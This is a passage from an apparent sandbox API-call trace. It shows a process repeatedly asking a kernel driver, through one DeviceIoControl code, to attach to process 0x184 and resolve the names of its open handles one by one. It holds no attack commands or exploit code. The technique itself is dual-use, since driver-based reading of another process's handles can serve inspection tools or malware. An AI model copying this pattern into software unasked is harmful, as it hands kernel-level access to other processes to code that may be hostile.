PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.592] ObReferenceObjectByHandle (in: Handle=0x670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018eac20, HandleInformation=0x0) returned 0x0 [0135.592] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.592] PsReleaseProcessExitSynchronization () returned 0x2 [0135.592] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.592] ObQueryNameString (in: Object=0xfffff8a0018eac20, ObjectNameInfo=0xfffffa800284c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284c044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.592] ObfDereferenceObject (Object=0xfffff8a0018eac20) returned 0x1 [0135.592] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.592] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.592] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.592] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.592] PsAcquireProcessExitSynchronization () returned 0x0 [0135.592] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.593] ObReferenceObjectByHandle (in: Handle=0x680, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018e1690, HandleInformation=0x0) returned 0x0 [0135.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.593] PsReleaseProcessExitSynchronization () returned 0x2 [0135.593] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.593] ObQueryNameString (in: Object=0xfffff8a0018e1690, ObjectNameInfo=0xfffffa8002855044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002855044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.593] ObfDereferenceObject (Object=0xfffff8a0018e1690) returned 0x1 [0135.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.594] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.594] PsAcquireProcessExitSynchronization () returned 0x0 [0135.594] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.594] ObReferenceObjectByHandle (in: Handle=0x690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018f1e50, HandleInformation=0x0) returned 0x0 [0135.594] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.594] PsReleaseProcessExitSynchronization () returned 0x2 [0135.594] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.594] ObQueryNameString (in: Object=0xfffff8a0018f1e50, ObjectNameInfo=0xfffffa8002856044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002856044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.594] ObfDereferenceObject (Object=0xfffff8a0018f1e50) returned 0x1 [0135.594] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.595] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.595] PsAcquireProcessExitSynchronization () returned 0x0 [0135.595] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.595] ObReferenceObjectByHandle (in: Handle=0x6a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018da6d0, HandleInformation=0x0) returned 0x0 [0135.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.595] PsReleaseProcessExitSynchronization () returned 0x2 [0135.595] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.595] ObQueryNameString (in: Object=0xfffff8a0018da6d0, ObjectNameInfo=0xfffffa8002878044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002878044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.595] ObfDereferenceObject (Object=0xfffff8a0018da6d0) returned 0x1 [0135.595] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.595] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.595] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.595] PsAcquireProcessExitSynchronization () returned 0x0 [0135.595] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.595] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018f4ee0, HandleInformation=0x0) returned 0x0 [0135.596] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.596] PsReleaseProcessExitSynchronization () returned 0x2 [0135.596] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.596] ObQueryNameString (in: Object=0xfffff8a0018f4ee0, ObjectNameInfo=0xfffffa800287d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287d044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.596] ObfDereferenceObject (Object=0xfffff8a0018f4ee0) returned 0x1 [0135.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.596] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.596] PsAcquireProcessExitSynchronization () returned 0x0 [0135.596] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.596] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018f8b10, HandleInformation=0x0) returned 0x0 [0135.596] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.596] PsReleaseProcessExitSynchronization () returned 0x2 [0135.596] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.596] ObQueryNameString (in: Object=0xfffff8a0018f8b10, ObjectNameInfo=0xfffffa800287f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287f044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.596] ObfDereferenceObject (Object=0xfffff8a0018f8b10) returned 0x1 [0135.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.597] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.597] PsAcquireProcessExitSynchronization () returned 0x0 [0135.597] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.597] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018e7060, HandleInformation=0x0) returned 0x0 [0135.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.597] PsReleaseProcessExitSynchronization () returned 0x2 [0135.597] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.597] ObQueryNameString (in: Object=0xfffff8a0018e7060, ObjectNameInfo=0xfffffa8002880044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002880044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.597] ObfDereferenceObject (Object=0xfffff8a0018e7060) returned 0x1 [0135.597] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.597] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.597] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.597] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.597] PsAcquireProcessExitSynchronization () returned 0x0 [0135.597] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.597] ObReferenceObjectByHandle (in: Handle=0x6e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019008c0, HandleInformation=0x0) returned 0x0 [0135.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.597] PsReleaseProcessExitSynchronization () returned 0x2 [0135.597] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.597] ObQueryNameString (in: Object=0xfffff8a0019008c0, ObjectNameInfo=0xfffffa8002882044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002882044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.597] ObfDereferenceObject (Object=0xfffff8a0019008c0) returned 0x1 [0135.597] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.597] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.597] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.597] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.598] PsAcquireProcessExitSynchronization () returned 0x0 [0135.598] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.598] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00190dc10, HandleInformation=0x0) returned 0x0 [0135.598] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.598] PsReleaseProcessExitSynchronization () returned 0x2 [0135.598] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.598] ObQueryNameString (in: Object=0xfffff8a00190dc10, ObjectNameInfo=0xfffffa8002883044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002883044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.598] ObfDereferenceObject (Object=0xfffff8a00190dc10) returned 0x1 [0135.598] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.598] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.598] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.598] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.598] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.598] PsAcquireProcessExitSynchronization () returned 0x0 [0135.598] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.598] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00190d3b0, HandleInformation=0x0) returned 0x0 [0135.598] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.598] PsReleaseProcessExitSynchronization () returned 0x2 [0135.598] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.598] ObQueryNameString (in: Object=0xfffff8a00190d3b0, ObjectNameInfo=0xfffffa80028b1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028b1044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.598] ObfDereferenceObject (Object=0xfffff8a00190d3b0) returned 0x1 [0135.598] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.599] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.599] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.599] PsAcquireProcessExitSynchronization () returned 0x0 [0135.599] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.599] ObReferenceObjectByHandle (in: Handle=0x710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001907c00, HandleInformation=0x0) returned 0x0 [0135.599] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.599] PsReleaseProcessExitSynchronization () returned 0x2 [0135.599] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.599] ObQueryNameString (in: Object=0xfffff8a001907c00, ObjectNameInfo=0xfffffa80028b2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028b2044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.599] ObfDereferenceObject (Object=0xfffff8a001907c00) returned 0x1 [0135.599] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.599] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.599] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.599] PsAcquireProcessExitSynchronization () returned 0x0 [0135.599] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.599] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001902fc0, HandleInformation=0x0) returned 0x0 [0135.599] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.600] PsReleaseProcessExitSynchronization () returned 0x2 [0135.600] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.600] ObQueryNameString (in: Object=0xfffff8a001902fc0, ObjectNameInfo=0xfffffa80028c2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c2044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.600] ObfDereferenceObject (Object=0xfffff8a001902fc0) returned 0x1 [0135.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.600] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.600] PsAcquireProcessExitSynchronization () returned 0x0 [0135.600] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.600] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0015405a0, HandleInformation=0x0) returned 0x0 [0135.600] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.600] PsReleaseProcessExitSynchronization () returned 0x2 [0135.600] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.600] ObQueryNameString (in: Object=0xfffff8a0015405a0, ObjectNameInfo=0xfffffa80028c7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c7044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.600] ObfDereferenceObject (Object=0xfffff8a0015405a0) returned 0x1 [0135.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.601] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.601] PsAcquireProcessExitSynchronization () returned 0x0 [0135.601] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.601] ObReferenceObjectByHandle (in: Handle=0x730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018f3c50, HandleInformation=0x0) returned 0x0 [0135.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.601] PsReleaseProcessExitSynchronization () returned 0x2 [0135.601] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.601] ObQueryNameString (in: Object=0xfffff8a0018f3c50, ObjectNameInfo=0xfffffa80028d7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028d7044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.601] ObfDereferenceObject (Object=0xfffff8a0018f3c50) returned 0x1 [0135.601] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.601] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.601] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.601] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.601] PsAcquireProcessExitSynchronization () returned 0x0 [0135.602] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.602] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019247d0, HandleInformation=0x0) returned 0x0 [0135.602] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.602] PsReleaseProcessExitSynchronization () returned 0x2 [0135.602] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.602] ObQueryNameString (in: Object=0xfffff8a0019247d0, ObjectNameInfo=0xfffffa8002907044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002907044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.602] ObfDereferenceObject (Object=0xfffff8a0019247d0) returned 0x1 [0135.602] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.602] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.602] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.602] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.602] PsAcquireProcessExitSynchronization () returned 0x0 [0135.602] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.602] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001942af0, HandleInformation=0x0) returned 0x0 [0135.602] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.602] PsReleaseProcessExitSynchronization () returned 0x2 [0135.602] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.603] ObQueryNameString (in: Object=0xfffff8a001942af0, ObjectNameInfo=0xfffffa8002908044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002908044, ReturnLength=0xfffff88005163550) 